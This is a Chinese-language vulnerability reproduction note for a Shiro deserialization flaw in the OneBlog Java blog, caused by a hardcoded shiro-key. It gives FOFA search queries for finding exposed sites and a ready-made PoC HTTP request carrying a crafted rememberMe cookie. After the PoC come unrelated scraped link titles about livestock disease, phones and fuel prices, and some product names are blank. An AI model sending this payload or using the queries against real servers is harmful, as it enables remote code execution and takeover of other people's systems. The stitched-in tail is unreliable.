0x01 产品简介
是一个简洁美观、功能强大并且自适应的Java博客 。使用开发,前端使用 。支持移动端自适应,配有完备的前台和后台管理功能 。
0x02 漏洞概述
v2.2.2及之前的版本存在 shiro 反序列化漏洞 , 该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据 , 在服务器上执行任意代码,执行系统命令、或打入内存马等 , 获取服务器权限 。
0x03 复现环境
FOFA:body="//js/zhyd.tool.js" || body=",开源博客"
0x04 漏洞复现
PoC
【OneBlog Shiro 反序列化漏洞复现】GET /passport/login/ HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Cookie: rememberMe=MERiOWRmRTYzRTVhRTdkNAV5Arkl/IQSpndZljnVXl9lknV7+t4WiqqsrNoVml0c4nVuXr4GJTo403JSNqQ3f31gLEVHN0SlS3YbumG/HDaiB2pefF3BTxg8J8L1EV/wKBKvmuZJKPtSkoYB7v4ly/X39hhS8EVUm+DIsg6tdnnMI/Y5WRvpZ4hnDtaMabMT3
- 数据流量反复连接断开怎么回事 数据流量反复连接断开
- 牛产后不吃草不反刍怎么治,产后子宫感染怎么办
- 牛不吃草不反刍不排便怎么办,不反刍动物有哪些
- ipad2反应慢怎么办 ipad2运行速度慢怎么办
- 牛有四个胃会反刍是什么意思,反刍动物有哪些
- 今天油价调整最新消息2月24日:油价反弹,本轮下调仍未稳
- 羊小反刍怎么打防疫针,羊小反刍是由什么原因引起的
- 羊积食不反刍最佳办法,羊积食是怎么引起的
- 小反刍都有什么特效药,反刍是什么意思
- 为什么下午不能给猪打疫苗,猪疫苗应激反应怎么办